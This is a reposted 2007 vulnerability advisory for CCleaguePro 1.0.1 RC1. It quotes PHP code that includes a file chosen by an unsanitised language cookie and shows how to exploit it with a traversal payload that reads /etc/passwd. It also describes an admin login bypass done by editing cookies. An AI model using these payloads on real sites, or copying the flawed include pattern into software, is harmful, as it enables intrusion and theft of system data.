Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16405
HistoryMar 19, 2007 - 12:00 a.m.

CCleaguePro_V1.0.1RC1 Directory Traversal Vulnerability

2007-03-1900:00:00
vulners.com
37

CCleaguePro_V1.0.1RC1 Directory Traversal Vulnerability

CCleaguePro
Version: 1.0.1 RC1
Website URL:http://www.castillocentral.com/

Discoved by Snake
[Unkn0wn Security Researcher]
The original article can be found at: http://unkn0wn.awardspace.com/

[XIII Security ResearcherZ]
Gr33tZ t0 :l0pht.blackhat,Kouros,Sasan, All Iranian Hackerz

Vulnerable code is in index.php & some 0ther pageZ
in line 27-35 :

---------------cut here --------------->

if($_COOKIE["language"]) {

    $llang = $_COOKIE["language"];

}
else
{

$l_array = explode("-",$lang_array[0]);
$llang = $l_array[0];

    setcookie("language",$llang,time()+1209600,"","","");

}

include("lang/".$llang.".php");
---------------cut here ---------------<

==============================================================
Ex:
open cookies and find portal cookies,chang this in first line(use opera for changing,is too easy whit opera!==>tools==>advance==>cookies):
---------------cut here --------------->
language

en
to
language

…/…/…/…/…/…/…/…/…/etc/passwd%00
---------------cut here ---------------<

in you found admin's email for login can chang cookeis some thing like this:

>---------------cut here ---------------
u

snake%40lolo.com

type

admin
---------------cut here ---------------<

and login Admin!